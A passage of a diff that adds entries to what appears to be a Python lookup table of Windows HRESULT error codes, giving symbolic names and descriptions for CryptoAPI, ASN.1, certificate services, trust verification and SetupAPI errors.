+ 0x80092028: ("CRYPT_E_NO_VERIFY_USAGE_CHECK", "The called function was unable to perform a usage check on the subject."),
+ 0x80092029: ("CRYPT_E_VERIFY_USAGE_OFFLINE", "The called function was unable to complete the usage check because the server was offline."),
+ 0x8009202A: ("CRYPT_E_NOT_IN_CTL", "The subject was not found in a certificate trust list (CTL)."),
+ 0x8009202B: ("CRYPT_E_NO_TRUSTED_SIGNER", "None of the signers of the cryptographic message or certificate trust list is trusted."),
+ 0x8009202C: ("CRYPT_E_MISSING_PUBKEY_PARA", "The public key's algorithm parameters are missing."),
+ 0x80093000: ("CRYPT_E_OSS_ERROR", "OSS Certificate encode/decode error code base."),
+ 0x80093001: ("OSS_MORE_BUF", "OSS ASN.1 Error: Output Buffer is too small."),
+ 0x80093002: ("OSS_NEGATIVE_UINTEGER", "OSS ASN.1 Error: Signed integer is encoded as a unsigned integer."),
+ 0x80093003: ("OSS_PDU_RANGE", "OSS ASN.1 Error: Unknown ASN.1 data type."),
+ 0x80093004: ("OSS_MORE_INPUT", "OSS ASN.1 Error: Output buffer is too small; the decoded data has been truncated."),
+ 0x80093005: ("OSS_DATA_ERROR", "OSS ASN.1 Error: Invalid data."),
+ 0x80093006: ("OSS_BAD_ARG", "OSS ASN.1 Error: Invalid argument."),
+ 0x80093007: ("OSS_BAD_VERSION", "OSS ASN.1 Error: Encode/Decode version mismatch."),
+ 0x80093008: ("OSS_OUT_MEMORY", "OSS ASN.1 Error: Out of memory."),
+ 0x80093009: ("OSS_PDU_MISMATCH", "OSS ASN.1 Error: Encode/Decode error."),
+ 0x8009300A: ("OSS_LIMITED", "OSS ASN.1 Error: Internal error."),
+ 0x8009300B: ("OSS_BAD_PTR", "OSS ASN.1 Error: Invalid data."),
+ 0x8009300C: ("OSS_BAD_TIME", "OSS ASN.1 Error: Invalid data."),
+ 0x8009300D: ("OSS_INDEFINITE_NOT_SUPPORTED", "OSS ASN.1 Error: Unsupported BER indefinite-length encoding."),
+ 0x8009300E: ("OSS_MEM_ERROR", "OSS ASN.1 Error: Access violation."),
+ 0x8009300F: ("OSS_BAD_TABLE", "OSS ASN.1 Error: Invalid data."),
+ 0x80093010: ("OSS_TOO_LONG", "OSS ASN.1 Error: Invalid data."),
+ 0x80093011: ("OSS_CONSTRAINT_VIOLATED", "OSS ASN.1 Error: Invalid data."),
+ 0x80093012: ("OSS_FATAL_ERROR", "OSS ASN.1 Error: Internal error."),
+ 0x80093013: ("OSS_ACCESS_SERIALIZATION_ERROR", "OSS ASN.1 Error: Multithreading conflict."),
+ 0x80093014: ("OSS_NULL_TBL", "OSS ASN.1 Error: Invalid data."),
+ 0x80093015: ("OSS_NULL_FCN", "OSS ASN.1 Error: Invalid data."),
+ 0x80093016: ("OSS_BAD_ENCRULES", "OSS ASN.1 Error: Invalid data."),
+ 0x80093017: ("OSS_UNAVAIL_ENCRULES", "OSS ASN.1 Error: Encode/Decode function not implemented."),
+ 0x80093018: ("OSS_CANT_OPEN_TRACE_WINDOW", "OSS ASN.1 Error: Trace file error."),
+ 0x80093019: ("OSS_UNIMPLEMENTED", "OSS ASN.1 Error: Function not implemented."),
+ 0x8009301A: ("OSS_OID_DLL_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x8009301B: ("OSS_CANT_OPEN_TRACE_FILE", "OSS ASN.1 Error: Trace file error."),
+ 0x8009301C: ("OSS_TRACE_FILE_ALREADY_OPEN", "OSS ASN.1 Error: Trace file error."),
+ 0x8009301D: ("OSS_TABLE_MISMATCH", "OSS ASN.1 Error: Invalid data."),
+ 0x8009301E: ("OSS_TYPE_NOT_SUPPORTED", "OSS ASN.1 Error: Invalid data."),
+ 0x8009301F: ("OSS_REAL_DLL_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x80093020: ("OSS_REAL_CODE_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x80093021: ("OSS_OUT_OF_RANGE", "OSS ASN.1 Error: Program link error."),
+ 0x80093022: ("OSS_COPIER_DLL_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x80093023: ("OSS_CONSTRAINT_DLL_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x80093024: ("OSS_COMPARATOR_DLL_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x80093025: ("OSS_COMPARATOR_CODE_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x80093026: ("OSS_MEM_MGR_DLL_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x80093027: ("OSS_PDV_DLL_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x80093028: ("OSS_PDV_CODE_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x80093029: ("OSS_API_DLL_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x8009302A: ("OSS_BERDER_DLL_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x8009302B: ("OSS_PER_DLL_NOT_LINKED", "OSS ASN.1 Error: Program link error."),
+ 0x8009302C: ("OSS_OPEN_TYPE_ERROR", "OSS ASN.1 Error: Program link error."),
+ 0x8009302D: ("OSS_MUTEX_NOT_CREATED", "OSS ASN.1 Error: System resource error."),
+ 0x8009302E: ("OSS_CANT_CLOSE_TRACE_FILE", "OSS ASN.1 Error: Trace file error."),
+ 0x80093100: ("CRYPT_E_ASN1_ERROR", "ASN1 Certificate encode/decode error code base."),
+ 0x80093101: ("CRYPT_E_ASN1_INTERNAL", "ASN1 internal encode or decode error."),
+ 0x80093102: ("CRYPT_E_ASN1_EOD", "ASN1 unexpected end of data."),
+ 0x80093103: ("CRYPT_E_ASN1_CORRUPT", "ASN1 corrupted data."),
+ 0x80093104: ("CRYPT_E_ASN1_LARGE", "ASN1 value too large."),
+ 0x80093105: ("CRYPT_E_ASN1_CONSTRAINT", "ASN1 constraint violated."),
+ 0x80093106: ("CRYPT_E_ASN1_MEMORY", "ASN1 out of memory."),
+ 0x80093107: ("CRYPT_E_ASN1_OVERFLOW", "ASN1 buffer overflow."),
+ 0x80093108: ("CRYPT_E_ASN1_BADPDU", "ASN1 function not supported for this protocol data unit (PDU)."),
+ 0x80093109: ("CRYPT_E_ASN1_BADARGS", "ASN1 bad arguments to function call."),
+ 0x8009310A: ("CRYPT_E_ASN1_BADREAL", "ASN1 bad real value."),
+ 0x8009310B: ("CRYPT_E_ASN1_BADTAG", "ASN1 bad tag value met."),
+ 0x8009310C: ("CRYPT_E_ASN1_CHOICE", "ASN1 bad choice value."),
+ 0x8009310D: ("CRYPT_E_ASN1_RULE", "ASN1 bad encoding rule."),
+ 0x8009310E: ("CRYPT_E_ASN1_UTF8", "ASN1 bad Unicode (UTF8)."),
+ 0x80093133: ("CRYPT_E_ASN1_PDU_TYPE", "ASN1 bad PDU type."),
+ 0x80093134: ("CRYPT_E_ASN1_NYI", "ASN1 not yet implemented."),
+ 0x80093201: ("CRYPT_E_ASN1_EXTENDED", "ASN1 skipped unknown extensions."),
+ 0x80093202: ("CRYPT_E_ASN1_NOEOD", "ASN1 end of data expected."),
+ 0x80094001: ("CERTSRV_E_BAD_REQUESTSUBJECT", "The request subject name is invalid or too long."),
+ 0x80094002: ("CERTSRV_E_NO_REQUEST", "The request does not exist."),
+ 0x80094003: ("CERTSRV_E_BAD_REQUESTSTATUS", "The request's current status does not allow this operation."),
+ 0x80094004: ("CERTSRV_E_PROPERTY_EMPTY", "The requested property value is empty."),
+ 0x80094005: ("CERTSRV_E_INVALID_CA_CERTIFICATE", "The CA's certificate contains invalid data."),
+ 0x80094006: ("CERTSRV_E_SERVER_SUSPENDED", "Certificate service has been suspended for a database restore operation."),
+ 0x80094007: ("CERTSRV_E_ENCODING_LENGTH", "The certificate contains an encoded length that is potentially incompatible with older enrollment software."),
+ 0x80094008: ("CERTSRV_E_ROLECONFLICT", "The operation is denied. The user has multiple roles assigned, and the CA is configured to enforce role separation."),
+ 0x80094009: ("CERTSRV_E_RESTRICTEDOFFICER", "The operation is denied. It can only be performed by a certificate manager that is allowed to manage certificates for the current requester."),
+ 0x8009400A: ("CERTSRV_E_KEY_ARCHIVAL_NOT_CONFIGURED", "Cannot archive private key. The CA is not configured for key archival."),
+ 0x8009400B: ("CERTSRV_E_NO_VALID_KRA", "Cannot archive private key. The CA could not verify one or more key recovery certificates."),
+ 0x8009400C: ("CERTSRV_E_BAD_REQUEST_KEY_ARCHIVAL", "The request is incorrectly formatted. The encrypted private key must be in an unauthenticated attribute in an outermost signature."),
+ 0x8009400D: ("CERTSRV_E_NO_CAADMIN_DEFINED", "At least one security principal must have the permission to manage this CA."),
+ 0x8009400E: ("CERTSRV_E_BAD_RENEWAL_CERT_ATTRIBUTE", "The request contains an invalid renewal certificate attribute."),
+ 0x8009400F: ("CERTSRV_E_NO_DB_SESSIONS", "An attempt was made to open a CA database session, but there are already too many active sessions. The server may need to be configured to allow additional sessions."),
+ 0x80094010: ("CERTSRV_E_ALIGNMENT_FAULT", "A memory reference caused a data alignment fault."),
+ 0x80094011: ("CERTSRV_E_ENROLL_DENIED", "The permissions on this CA do not allow the current user to enroll for certificates."),
+ 0x80094012: ("CERTSRV_E_TEMPLATE_DENIED", "The permissions on the certificate template do not allow the current user to enroll for this type of certificate."),
+ 0x80094013: ("CERTSRV_E_DOWNLEVEL_DC_SSL_OR_UPGRADE", "The contacted domain controller cannot support signed Lightweight Directory Access Protocol (LDAP) traffic. Update the domain controller or configure Certificate Services to use SSL for Active Directory access."),
+ 0x80094800: ("CERTSRV_E_UNSUPPORTED_CERT_TYPE", "The requested certificate template is not supported by this CA."),
+ 0x80094801: ("CERTSRV_E_NO_CERT_TYPE", "The request contains no certificate template information."),
+ 0x80094802: ("CERTSRV_E_TEMPLATE_CONFLICT", "The request contains conflicting template information."),
+ 0x80094803: ("CERTSRV_E_SUBJECT_ALT_NAME_REQUIRED", "The request is missing a required Subject Alternate name extension."),
+ 0x80094804: ("CERTSRV_E_ARCHIVED_KEY_REQUIRED", "The request is missing a required private key for archival by the server."),
+ 0x80094805: ("CERTSRV_E_SMIME_REQUIRED", "The request is missing a required SMIME capabilities extension."),
+ 0x80094806: ("CERTSRV_E_BAD_RENEWAL_SUBJECT", "The request was made on behalf of a subject other than the caller. The certificate template must be configured to require at least one signature to authorize the request."),
+ 0x80094807: ("CERTSRV_E_BAD_TEMPLATE_VERSION", "The request template version is newer than the supported template version."),
+ 0x80094808: ("CERTSRV_E_TEMPLATE_POLICY_REQUIRED", "The template is missing a required signature policy attribute."),
+ 0x80094809: ("CERTSRV_E_SIGNATURE_POLICY_REQUIRED", "The request is missing required signature policy information."),
+ 0x8009480A: ("CERTSRV_E_SIGNATURE_COUNT", "The request is missing one or more required signatures."),
+ 0x8009480B: ("CERTSRV_E_SIGNATURE_REJECTED", "One or more signatures did not include the required application or issuance policies. The request is missing one or more required valid signatures."),
+ 0x8009480C: ("CERTSRV_E_ISSUANCE_POLICY_REQUIRED", "The request is missing one or more required signature issuance policies."),
+ 0x8009480D: ("CERTSRV_E_SUBJECT_UPN_REQUIRED", "The UPN is unavailable and cannot be added to the Subject Alternate name."),
+ 0x8009480E: ("CERTSRV_E_SUBJECT_DIRECTORY_GUID_REQUIRED", "The Active Directory GUID is unavailable and cannot be added to the Subject Alternate name."),
+ 0x8009480F: ("CERTSRV_E_SUBJECT_DNS_REQUIRED", "The Domain Name System (DNS) name is unavailable and cannot be added to the Subject Alternate name."),
+ 0x80094810: ("CERTSRV_E_ARCHIVED_KEY_UNEXPECTED", "The request includes a private key for archival by the server, but key archival is not enabled for the specified certificate template."),
+ 0x80094811: ("CERTSRV_E_KEY_LENGTH", "The public key does not meet the minimum size required by the specified certificate template."),
+ 0x80094812: ("CERTSRV_E_SUBJECT_EMAIL_REQUIRED", "The email name is unavailable and cannot be added to the Subject or Subject Alternate name."),
+ 0x80094813: ("CERTSRV_E_UNKNOWN_CERT_TYPE", "One or more certificate templates to be enabled on this CA could not be found."),
+ 0x80094814: ("CERTSRV_E_CERT_TYPE_OVERLAP", "The certificate template renewal period is longer than the certificate validity period. The template should be reconfigured or the CA certificate renewed."),
+ 0x80094815: ("CERTSRV_E_TOO_MANY_SIGNATURES", "The certificate template requires too many return authorization (RA) signatures. Only one RA signature is allowed."),
+ 0x80094816: ("CERTSRV_E_RENEWAL_BAD_PUBLIC_KEY", "The key used in a renewal request does not match one of the certificates being renewed."),
+ 0x80094817: ("CERTSRV_E_INVALID_EK", "The endorsement key certificate is not valid."),
+ 0x8009481A: ("CERTSRV_E_KEY_ATTESTATION", "Key attestation did not succeed."),
+ 0x80095000: ("XENROLL_E_KEY_NOT_EXPORTABLE", "The key is not exportable."),
+ 0x80095001: ("XENROLL_E_CANNOT_ADD_ROOT_CERT", "You cannot add the root CA certificate into your local store."),
+ 0x80095002: ("XENROLL_E_RESPONSE_KA_HASH_NOT_FOUND", "The key archival hash attribute was not found in the response."),
+ 0x80095003: ("XENROLL_E_RESPONSE_UNEXPECTED_KA_HASH", "An unexpected key archival hash attribute was found in the response."),
+ 0x80095004: ("XENROLL_E_RESPONSE_KA_HASH_MISMATCH", "There is a key archival hash mismatch between the request and the response."),
+ 0x80095005: ("XENROLL_E_KEYSPEC_SMIME_MISMATCH", "Signing certificate cannot include SMIME extension."),
+ 0x80096001: ("TRUST_E_SYSTEM_ERROR", "A system-level error occurred while verifying trust."),
+ 0x80096002: ("TRUST_E_NO_SIGNER_CERT", "The certificate for the signer of the message is invalid or not found."),
+ 0x80096003: ("TRUST_E_COUNTER_SIGNER", "One of the counter signatures was invalid."),
+ 0x80096004: ("TRUST_E_CERT_SIGNATURE", "The signature of the certificate cannot be verified."),
+ 0x80096005: ("TRUST_E_TIME_STAMP", "The time-stamp signature or certificate could not be verified or is malformed."),
+ 0x80096010: ("TRUST_E_BAD_DIGEST", "The digital signature of the object did not verify."),
+ 0x80096019: ("TRUST_E_BASIC_CONSTRAINTS", "A certificate's basic constraint extension has not been observed."),
+ 0x8009601E: ("TRUST_E_FINANCIAL_CRITERIA", "The certificate does not meet or contain the Authenticode financial extensions."),
+ 0x80097001: ("MSSIPOTF_E_OUTOFMEMRANGE", "Tried to reference a part of the file outside the proper range."),
+ 0x80097002: ("MSSIPOTF_E_CANTGETOBJECT", "Could not retrieve an object from the file."),
+ 0x80097003: ("MSSIPOTF_E_NOHEADTABLE", "Could not find the head table in the file."),
+ 0x80097004: ("MSSIPOTF_E_BAD_MAGICNUMBER", "The magic number in the head table is incorrect."),
+ 0x80097005: ("MSSIPOTF_E_BAD_OFFSET_TABLE", "The offset table has incorrect values."),
+ 0x80097006: ("MSSIPOTF_E_TABLE_TAGORDER", "Duplicate table tags or the tags are out of alphabetical order."),
+ 0x80097007: ("MSSIPOTF_E_TABLE_LONGWORD", "A table does not start on a long word boundary."),
+ 0x80097008: ("MSSIPOTF_E_BAD_FIRST_TABLE_PLACEMENT", "First table does not appear after header information."),
+ 0x80097009: ("MSSIPOTF_E_TABLES_OVERLAP", "Two or more tables overlap."),
+ 0x8009700A: ("MSSIPOTF_E_TABLE_PADBYTES", "Too many pad bytes between tables, or pad bytes are not 0."),
+ 0x8009700B: ("MSSIPOTF_E_FILETOOSMALL", "File is too small to contain the last table."),
+ 0x8009700C: ("MSSIPOTF_E_TABLE_CHECKSUM", "A table checksum is incorrect."),
+ 0x8009700D: ("MSSIPOTF_E_FILE_CHECKSUM", "The file checksum is incorrect."),
+ 0x80097010: ("MSSIPOTF_E_FAILED_POLICY", "The signature does not have the correct attributes for the policy."),
+ 0x80097011: ("MSSIPOTF_E_FAILED_HINTS_CHECK", "The file did not pass the hints check."),
+ 0x80097012: ("MSSIPOTF_E_NOT_OPENTYPE", "The file is not an OpenType file."),
+ 0x80097013: ("MSSIPOTF_E_FILE", "Failed on a file operation (such as open, map, read, or write)."),
+ 0x80097014: ("MSSIPOTF_E_CRYPT", "A call to a CryptoAPI function failed."),
+ 0x80097015: ("MSSIPOTF_E_BADVERSION", "There is a bad version number in the file."),
+ 0x80097016: ("MSSIPOTF_E_DSIG_STRUCTURE", "The structure of the DSIG table is incorrect."),
+ 0x80097017: ("MSSIPOTF_E_PCONST_CHECK", "A check failed in a partially constant table."),
+ 0x80097018: ("MSSIPOTF_E_STRUCTURE", "Some kind of structural error."),
+ 0x80097019: ("ERROR_CRED_REQUIRES_CONFIRMATION", "The requested credential requires confirmation."),
+ 0x800B0001: ("TRUST_E_PROVIDER_UNKNOWN", "Unknown trust provider."),
+ 0x800B0002: ("TRUST_E_ACTION_UNKNOWN", "The trust verification action specified is not supported by the specified trust provider."),
+ 0x800B0003: ("TRUST_E_SUBJECT_FORM_UNKNOWN", "The form specified for the subject is not one supported or known by the specified trust provider."),
+ 0x800B0004: ("TRUST_E_SUBJECT_NOT_TRUSTED", "The subject is not trusted for the specified action."),
+ 0x800B0005: ("DIGSIG_E_ENCODE", "Error due to problem in ASN.1 encoding process."),
+ 0x800B0006: ("DIGSIG_E_DECODE", "Error due to problem in ASN.1 decoding process."),
+ 0x800B0007: ("DIGSIG_E_EXTENSIBILITY", "Reading/writing extensions where attributes are appropriate, and vice versa."),
+ 0x800B0008: ("DIGSIG_E_CRYPTO", "Unspecified cryptographic failure."),
+ 0x800B0009: ("PERSIST_E_SIZEDEFINITE", "The size of the data could not be determined."),
+ 0x800B000A: ("PERSIST_E_SIZEINDEFINITE", "The size of the indefinite-sized data could not be determined."),
+ 0x800B000B: ("PERSIST_E_NOTSELFSIZING", "This object does not read and write self-sizing data."),
+ 0x800B0100: ("TRUST_E_NOSIGNATURE", "No signature was present in the subject."),
+ 0x800B0101: ("CERT_E_EXPIRED", "A required certificate is not within its validity period when verifying against the current system clock or the time stamp in the signed file."),
+ 0x800B0102: ("CERT_E_VALIDITYPERIODNESTING", "The validity periods of the certification chain do not nest correctly."),
+ 0x800B0103: ("CERT_E_ROLE", "A certificate that can only be used as an end entity is being used as a CA or vice versa."),
+ 0x800B0104: ("CERT_E_PATHLENCONST", "A path length constraint in the certification chain has been violated."),
+ 0x800B0105: ("CERT_E_CRITICAL", "A certificate contains an unknown extension that is marked \"critical\"."),
+ 0x800B0106: ("CERT_E_PURPOSE", "A certificate is being used for a purpose other than the ones specified by its CA."),
+ 0x800B0107: ("CERT_E_ISSUERCHAINING", "A parent of a given certificate did not issue that child certificate."),
+ 0x800B0108: ("CERT_E_MALFORMED", "A certificate is missing or has an empty value for an important field, such as a subject or issuer name."),
+ 0x800B0109: ("CERT_E_UNTRUSTEDROOT", "A certificate chain processed, but terminated in a root certificate that is not trusted by the trust provider."),
+ 0x800B010A: ("CERT_E_CHAINING", "A certificate chain could not be built to a trusted root authority."),
+ 0x800B010B: ("TRUST_E_FAIL", "Generic trust failure."),
+ 0x800B010C: ("CERT_E_REVOKED", "A certificate was explicitly revoked by its issuer."),
+ 0x800B010D: ("CERT_E_UNTRUSTEDTESTROOT", "The certification path terminates with the test root that is not trusted with the current policy settings."),
+ 0x800B010E: ("CERT_E_REVOCATION_FAILURE", "The revocation process could not continue-the certificates could not be checked."),
+ 0x800B010F: ("CERT_E_CN_NO_MATCH", "The certificate's CN name does not match the passed value."),
+ 0x800B0110: ("CERT_E_WRONG_USAGE", "The certificate is not valid for the requested usage."),
+ 0x800B0111: ("TRUST_E_EXPLICIT_DISTRUST", "The certificate was explicitly marked as untrusted by the user."),
+ 0x800B0112: ("CERT_E_UNTRUSTEDCA", "A certification chain processed correctly, but one of the CA certificates is not trusted by the policy provider."),
+ 0x800B0113: ("CERT_E_INVALID_POLICY", "The certificate has invalid policy."),
+ 0x800B0114: ("CERT_E_INVALID_NAME", "The certificate has an invalid name. The name is not included in the permitted list or is explicitly excluded."),
+ 0x800D0003: ("NS_W_SERVER_BANDWIDTH_LIMIT", "The maximum filebitrate value specified is greater than the server's configured maximum bandwidth."),
+ 0x800D0004: ("NS_W_FILE_BANDWIDTH_LIMIT", "The maximum bandwidth value specified is less than the maximum filebitrate."),
+ 0x800D0060: ("NS_W_UNKNOWN_EVENT", "Unknown %1 event encountered."),
+ 0x800D0199: ("NS_I_CATATONIC_FAILURE", "Disk %1 ( %2 ) on Content Server %3, will be failed because it is catatonic."),
+ 0x800D019A: ("NS_I_CATATONIC_AUTO_UNFAIL", "Disk %1 ( %2 ) on Content Server %3, auto online from catatonic state."),
+ 0x800F0000: ("SPAPI_E_EXPECTED_SECTION_NAME", "A non-empty line was encountered in the INF before the start of a section."),
+ 0x800F0001: ("SPAPI_E_BAD_SECTION_NAME_LINE", "A section name marker in the information file (INF) is not complete or does not exist on a line by itself."),
+ 0x800F0002: ("SPAPI_E_SECTION_NAME_TOO_LONG", "An INF section was encountered whose name exceeds the maximum section name length."),
+ 0x800F0003: ("SPAPI_E_GENERAL_SYNTAX", "The syntax of the INF is invalid."),
+ 0x800F0100: ("SPAPI_E_WRONG_INF_STYLE", "The style of the INF is different than what was requested."),
+ 0x800F0101: ("SPAPI_E_SECTION_NOT_FOUND", "The required section was not found in the INF."),
+ 0x800F0102: ("SPAPI_E_LINE_NOT_FOUND", "The required line was not found in the INF."),
+ 0x800F0103: ("SPAPI_E_NO_BACKUP", "The files affected by the installation of this file queue have not been backed up for uninstall."),
+ 0x800F0200: ("SPAPI_E_NO_ASSOCIATED_CLASS", "The INF or the device information set or element does not have an associated install class."),
+ 0x800F0201: ("SPAPI_E_CLASS_MISMATCH", "The INF or the device information set or element does not match the specified install class."),
+ 0x800F0202: ("SPAPI_E_DUPLICATE_FOUND", "An existing device was found that is a duplicate of the device being manually installed."),
+ 0x800F0203: ("SPAPI_E_NO_DRIVER_SELECTED", "There is no driver selected for the device information set or element."),
+ 0x800F0204: ("SPAPI_E_KEY_DOES_NOT_EXIST", "The requested device registry key does not exist."),
+ 0x800F0205: ("SPAPI_E_INVALID_DEVINST_NAME", "The device instance name is invalid."),
+ 0x800F0206: ("SPAPI_E_INVALID_CLASS", "The install class is not present or is invalid."),
+ 0x800F0207: ("SPAPI_E_DEVINST_ALREADY_EXISTS", "The device instance cannot be created because it already exists."),
+ 0x800F0208: ("SPAPI_E_DEVINFO_NOT_REGISTERED", "The operation cannot be performed on a device information element that has not been registered."),
+ 0x800F0209: ("SPAPI_E_INVALID_REG_PROPERTY", "The device property code is invalid."),
+ 0x800F020A: ("SPAPI_E_NO_INF", "The INF from which a driver list is to be built does not exist."),
+ 0x800F020B: ("SPAPI_E_NO_SUCH_DEVINST", "The device instance does not exist in the hardware tree."),
+ 0x800F020C: ("SPAPI_E_CANT_LOAD_CLASS_ICON", "The icon representing this install class cannot be loaded."),
+ 0x800F020D: ("SPAPI_E_INVALID_CLASS_INSTALLER", "The class installer registry entry is invalid."),
+ 0x800F020E: ("SPAPI_E_DI_DO_DEFAULT", "The class installer has indicated that the default action should be performed for this installation request."),
+ 0x800F020F: ("SPAPI_E_DI_NOFILECOPY", "The operation does not require any files to be copied."),
+ 0x800F0210: ("SPAPI_E_INVALID_HWPROFILE", "The specified hardware profile does not exist."),
+ 0x800F0211: ("SPAPI_E_NO_DEVICE_SELECTED", "There is no device information element currently selected for this device information set."),
+ 0x800F0212: ("SPAPI_E_DEVINFO_LIST_LOCKED", "The operation cannot be performed because the device information set is locked."),
+ 0x800F0213: ("SPAPI_E_DEVINFO_DATA_LOCKED", "The operation cannot be performed because the device information element is locked."),
+ 0x800F0214: ("SPAPI_E_DI_BAD_PATH", "The specified path does not contain any applicable device INFs."),
+ 0x800F0215: ("SPAPI_E_NO_CLASSINSTALL_PARAMS", "No class installer parameters have been set for the device information set or element."),
+ 0x800F0216: ("SPAPI_E_FILEQUEUE_LOCKED", "The operation cannot be performed because the file queue is locked."),
+ 0x800F0217: ("SPAPI_E_BAD_SERVICE_INSTALLSECT", "A service installation section in this INF is invalid."),
+ 0x800F0218: ("SPAPI_E_NO_CLASS_DRIVER_LIST", "There is no class driver list for the device information element."),
+ 0x800F0219: ("SPAPI_E_NO_ASSOCIATED_SERVICE", "The installation failed because a function driver was not specified for this device instance."),
+ 0x800F021A: ("SPAPI_E_NO_DEFAULT_DEVICE_INTERFACE", "There is presently no default device interface designated for this interface class."),
+ 0x800F021B: ("SPAPI_E_DEVICE_INTERFACE_ACTIVE", "The operation cannot be performed because the device interface is currently active."),
+ 0x800F021C: ("SPAPI_E_DEVICE_INTERFACE_REMOVED", "The operation cannot be performed because the device interface has been removed from the system."),
+ 0x800F021D: ("SPAPI_E_BAD_INTERFACE_INSTALLSECT", "An interface installation section in this INF is invalid."),
+ 0x800F021E: ("SPAPI_E_NO_SUCH_INTERFACE_CLASS", "This interface class does not exist in the system."),
+ 0x800F021F: ("SPAPI_E_INVALID_REFERENCE_STRING", "The reference string supplied for this interface device is invalid."),
+ 0x800F0220: ("SPAPI_E_INVALID_MACHINENAME", "The specified machine name does not conform to Universal Naming Convention (UNCs)."),
+ 0x800F0221: ("SPAPI_E_REMOTE_COMM_FAILURE", "A general remote communication error occurred."),
+ 0x800F0222: ("SPAPI_E_MACHINE_UNAVAILABLE", "The machine selected for remote communication is not available at this time."),
+ 0x800F0223: ("SPAPI_E_NO_CONFIGMGR_SERVICES", "The Plug and Play service is not available on the remote machine."),
+ 0x800F0224: ("SPAPI_E_INVALID_PROPPAGE_PROVIDER", "The property page provider registry entry is invalid."),
+ 0x800F0225: ("SPAPI_E_NO_SUCH_DEVICE_INTERFACE", "The requested device interface is not present in the system."),
+ 0x800F0226: ("SPAPI_E_DI_POSTPROCESSING_REQUIRED", "The device's co-installer has additional work to perform after installation is complete."),
+ 0x800F0227: ("SPAPI_E_INVALID_COINSTALLER", "The device's co-installer is invalid."),
+ 0x800F0228: ("SPAPI_E_NO_COMPAT_DRIVERS", "There are no compatible drivers for this device."),
+ 0x800F0229: ("SPAPI_E_NO_DEVICE_ICON", "There is no icon that represents this device or device type."),
+ 0x800F022A: ("SPAPI_E_INVALID_INF_LOGCONFIG", "A logical configuration specified in this INF is invalid."),
+ 0x800F022B: ("SPAPI_E_DI_DONT_INSTALL", "The class installer has denied the request to install or upgrade this device."),
+ 0x800F022C: ("SPAPI_E_INVALID_FILTER_DRIVER", "One of the filter drivers installed for this device is invalid."),
+ 0x800F022D: ("SPAPI_E_NON_WINDOWS_NT_DRIVER", "The driver selected for this device does not support Windows XP."),
+ 0x800F022E: ("SPAPI_E_NON_WINDOWS_DRIVER", "The driver selected for this device does not support Windows."),
+ 0x800F022F: ("SPAPI_E_NO_CATALOG_FOR_OEM_INF", "The third-party INF does not contain digital signature information."),
+ 0x800F0230: ("SPAPI_E_DEVINSTALL_QUEUE_NONNATIVE", "An invalid attempt was made to use a device installation file queue for verification of digital signatures relative to other platforms."),
+ 0x800F0231: ("SPAPI_E_NOT_DISABLEABLE", "The device cannot be disabled."),
+ 0x800F0232: ("SPAPI_E_CANT_REMOVE_DEVINST", "The device could not be dynamically removed."),
+ 0x800F0233: ("SPAPI_E_INVALID_TARGET", "Cannot copy to specified target."),
+ 0x800F0234: ("SPAPI_E_DRIVER_NONNATIVE", "Driver is not intended for this platform."),
+ 0x800F0235: ("SPAPI_E_IN_WOW64", "Operation not allowed in WOW64."),
+ 0x800F0236: ("SPAPI_E_SET_SYSTEM_RESTORE_POINT", "The operation involving unsigned file copying was rolled back, so that a system restore point could be set."),
+ 0x800F0237: ("SPAPI_E_INCORRECTLY_COPIED_INF", "An INF was copied into the Windows INF directory in an improper manner."),
+ 0x800F0238: ("SPAPI_E_SCE_DISABLED", "The Security Configuration Editor (SCE) APIs have been disabled on this embedded product."),
+ 0x800F0239: ("SPAPI_E_UNKNOWN_EXCEPTION", "An unknown exception was encountered."),
+ 0x800F023A: ("SPAPI_E_PNP_REGISTRY_ERROR", "A problem was encountered when accessing the Plug and Play registry database."),
+ 0x800F023B: ("SPAPI_E_REMOTE_REQUEST_UNSUPPORTED", "The requested operation is not supported for a remote machine."),
+ 0x800F023C: ("SPAPI_E_NOT_AN_INSTALLED_OEM_INF", "The specified file is not an installed original equipment manufacturer (OEM) INF."),
+ 0x800F023D: ("SPAPI_E_INF_IN_USE_BY_DEVICES", "One or more devices are presently installed using the specified INF."),
+ 0x800F023E: ("SPAPI_E_DI_FUNCTION_OBSOLETE", "The requested device install operation is obsolete."),
+ 0x800F023F: ("SPAPI_E_NO_AUTHENTICODE_CATALOG", "A file could not be verified because it does not have an associated catalog signed via Authenticode."),
+ 0x800F0240: ("SPAPI_E_AUTHENTICODE_DISALLOWED", "Authenticode signature verification is not supported for the specified INF."),
+ 0x800F0241: ("SPAPI_E_AUTHENTICODE_TRUSTED_PUBLISHER", "The INF was signed with an Authenticode catalog from a trusted publisher."),
+ 0x800F0242: ("SPAPI_E_AUTHENTICODE_TRUST_NOT_ESTABLISHED", "The publisher of an Authenticode-signed catalog has not yet been established as trusted."),
+ 0x800F0243: ("SPAPI_E_AUTHENTICODE_PUBLISHER_NOT_TRUSTED", "The publisher of an Authenticode-signed catalog was not established as trusted."),
+ 0x800F0244: ("SPAPI_E_SIGNATURE_OSATTRIBUTE_MISMATCH", "The software was tested for compliance with Windows logo requirements on a different version of Windows and may not be compatible with this version."),
+ 0x800F0245: ("SPAPI_E_ONLY_VALIDATE_VIA_AUTHENTICODE", "The file may be validated only by a catalog signed via Authenticode."),
+ 0x800F0246: ("SPAPI_E_DEVICE_INSTALLER_NOT_READY", "One of the installers for this device cannot perform the installation at this time."),
+ 0x800F0247: ("SPAPI_E_DRIVER_STORE_ADD_FAILED", "A problem was encountered while attempting to add the driver to the store."),
+ 0x800F0248: ("SPAPI_E_DEVICE_INSTALL_BLOCKED", "The installation of this device is forbidden by system policy. Contact your system administrator."),
